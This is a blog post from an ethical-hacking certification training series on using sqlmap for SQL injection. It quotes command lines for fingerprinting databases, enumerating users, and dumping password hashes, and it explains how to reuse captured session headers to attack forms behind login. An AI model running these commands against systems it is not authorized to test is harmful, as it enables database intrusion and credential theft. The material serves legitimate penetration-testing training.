[ Certified Ethical Hacker v10 ] :: [ Chapter 6 cont’d] :: sqlmap

This entry is part 12 of 30 in the series [ Certified Ethical Hacker Training ]

Using sqlmap

This wicked tool comes with Kali and is easy to install on other Linuxes. All you need is a web form on a website as an entry point for SQL injection.

See this short “cookbook” first for quick examples of usage:

From https://securityonline.info/top-25-useful-sqlmap-commands/

Here’s the lengthy GitHub usage page:


Using Captured Headers to Get Past Authentication

You can attack injection points manually, or if you need to inject into a form that’s behind authentication, you can capture a header using Burp, save it as a file, and let sqlmap use the parameters (like session tokens and cookies) right from that file.

You can also use the CO2 extension in Burp to pass authentication tokens:


sqlmap POST request injection

From https://hackertarget.com/sqlmap-post-request-injection/ :

# Parse request data and test | request data can be obtained with burp

./sqlmap.py -r <request-file> <options>

#Fingerprint | much more information than banner

./sqlmap.py -r <request-file> --fingerprint

# Get database username, name, and hostname

./sqlmap.py -r <request-file> --current-user --current-db --hostname

# Check if user is a database admin

./sqlmap.py -r <request-file> --is-dba

# Get database users and password hashes

./sqlmap.py -r <request-file> --users --passwords

From https://github.com/sqlmapproject/sqlmap/wiki/Usage :

# Supply POST data with the –data option

python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users

# Manipulate cookies:
Options and switch: --cookie, --cookie-del, --load-cookies and --drop-set-cookie

And here’s a good, straightforward medium-length tutorial with examples of the major operations, like database discovery, table and column enumeration, data dumps etc.:

Sqlmap tutorial for beginners – hacking with sql injection

Or try this shorter tutorial:


Introducing JackkTutorials. This is a great YouTube channel on lots of hacking subjects, and this 15-minute video walks you through the basics:


Getting Past Authentication

Finally, here’s some discussion of using sqlmap to access (from the command line or Burp or similar) pages/forms that lie behind authentication, meaning you’ll need to pass session tokens and params with your attacks:


Basically, the job is to capture a request header and use it in Burp or with

sqlmap -r headerfile.txt ...